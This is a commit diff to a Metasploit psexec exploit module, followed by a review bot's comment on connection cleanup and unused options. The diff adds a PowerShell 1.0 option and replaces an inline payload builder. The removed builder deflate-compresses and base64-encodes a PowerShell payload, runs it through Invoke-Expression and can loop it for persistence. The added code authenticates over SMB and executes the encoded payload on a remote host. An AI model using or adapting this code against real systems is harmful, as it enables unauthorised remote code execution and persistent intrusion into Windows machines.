add libs from #1379 and allow psh 1.0 exec against older hosts
parent
61cd3b55fc
commit
6ba85d4c06
|
@ -1,16 +1,19 @@
|
|||
# -*- coding: binary -*-
|
||||
#!/usr/bin/env ruby
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Exploit::Remote::SMB::Authenticated
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
|
||||
# Aliases for common classes
|
||||
SIMPLE = Rex::Proto::SMB::SimpleClient
|
||||
XCEPT = Rex::Proto::SMB::Exceptions
|
||||
|
@ -71,31 +74,32 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
||||
false
|
||||
]),
|
||||
OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
# Build the script
|
||||
command = prep_psh_payload
|
||||
def exploit
|
||||
command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
|
||||
|
||||
# Try and authenticate with given credentials
|
||||
#Try and authenticate with given credentials
|
||||
if connect
|
||||
begin
|
||||
begin
|
||||
smb_login
|
||||
rescue StandardError => autherror
|
||||
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
||||
return
|
||||
end
|
||||
# Execute the powershell command
|
||||
begin
|
||||
print_status("#{peer} - Executing the payload...")
|
||||
return psexec(command)
|
||||
rescue StandardError => exec_command_error
|
||||
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
return false
|
||||
end
|
||||
disconnect
|
||||
end
|
||||
# Execute the powershell command
|
||||
begin
|
||||
print_status("#{peer} - Executing the payload...")
|
||||
#vprint_good(command)
|
||||
return psexec(command)
|
||||
rescue StandardError => exec_command_error
|
||||
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
return false
|
||||
end
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -220,56 +224,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return true
|
||||
end
|
||||
|
||||
# Return a zlib compressed powershell script
|
||||
def compress_script(script_in)
|
||||
|
||||
# Compress using the Deflate algorithm
|
||||
compressed_stream = ::Zlib::Deflate.deflate(script_in,
|
||||
::Zlib::BEST_COMPRESSION)
|
||||
|
||||
# Base64 encode the compressed file contents
|
||||
encoded_stream = Rex::Text.encode_base64(compressed_stream)
|
||||
|
||||
# Build the powershell expression
|
||||
# Decode base64 encoded command and create a stream object
|
||||
psh_expression = "$stream = New-Object IO.MemoryStream(,"
|
||||
psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
|
||||
# Read & delete the first two bytes due to incompatibility with MS
|
||||
psh_expression += "$stream.ReadByte()|Out-Null;"
|
||||
psh_expression += "$stream.ReadByte()|Out-Null;"
|
||||
# Uncompress and invoke the expression (execute)
|
||||
psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
|
||||
psh_expression += "$(New-Object IO.Compression.DeflateStream("
|
||||
psh_expression += "$stream,"
|
||||
psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
|
||||
psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
|
||||
|
||||
# Convert expression to unicode
|
||||
unicode_expression = Rex::Text.to_unicode(psh_expression)
|
||||
|
||||
# Base64 encode the unicode expression
|
||||
encoded_expression = Rex::Text.encode_base64(unicode_expression)
|
||||
|
||||
return encoded_expression
|
||||
end
|
||||
|
||||
def peer
|
||||
return "#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
# Return a command-line payload configured per datastore
|
||||
def prep_psh_payload
|
||||
psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.raw)
|
||||
# Run our payload in a while loop
|
||||
if datastore['PERSIST']
|
||||
fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
|
||||
sleep_time = rand(5)+5
|
||||
psh_payload = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
|
||||
end
|
||||
# Convert to base64 for -encodedcommand execution
|
||||
psh_payload = compress_script(psh_payload)
|
||||
# Determine appropriate architecture
|
||||
ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
|
||||
command = "%COMSPEC% /B /C start #{ps_bin} -EncodedCommand #{psh_payload}"
|
||||
end
|
||||
end
|
||||
|
|
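Review bot: In the new `exploit` body the trailing `disconnect` is unreachable: the inner `begin` either hits `return psexec(command)` or `return false` in its `rescue`, and the `smb_login` failure path also does a bare `return`, so the SMB session opened by `connect` is never torn down by this method (harmless only if `psexec` or the mixin's cleanup closes it — worth confirming rather than relying on). Moving `disconnect` into an `ensure` that wraps everything after `if connect` makes the teardown run on every exit path, including the auth-failure return. Separately, the commit drops the local `prep_psh_payload`, which used to read `datastore['PERSIST']` and `datastore['RUN_WOW64']`, but the replacement call `cmd_psh_payload(payload.encoded, datastore['PSH_OLD_METHOD'])` passes neither; the `RUN_WOW64` option is still registered in this hunk, so unless the new `Msf::Exploit::Powershell` mixin reads those keys from the datastore itself they are now silently dead options, and a comment such as `# PERSIST/RUN_WOW64 are consumed by the Powershell mixin` (or passing them explicitly) would settle it. Since the second argument is a bare positional boolean, a keyword or a comment naming it at the call site would also help the next reader.
```ruby
    if connect
      begin
        begin
          smb_login
        rescue StandardError => autherror
          print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
          return
        end
        # … unchanged: print_status / return psexec(command) / rescue exec_command_error …
      ensure
        # runs on every exit path above, including the early returns
        disconnect
      end
    end
```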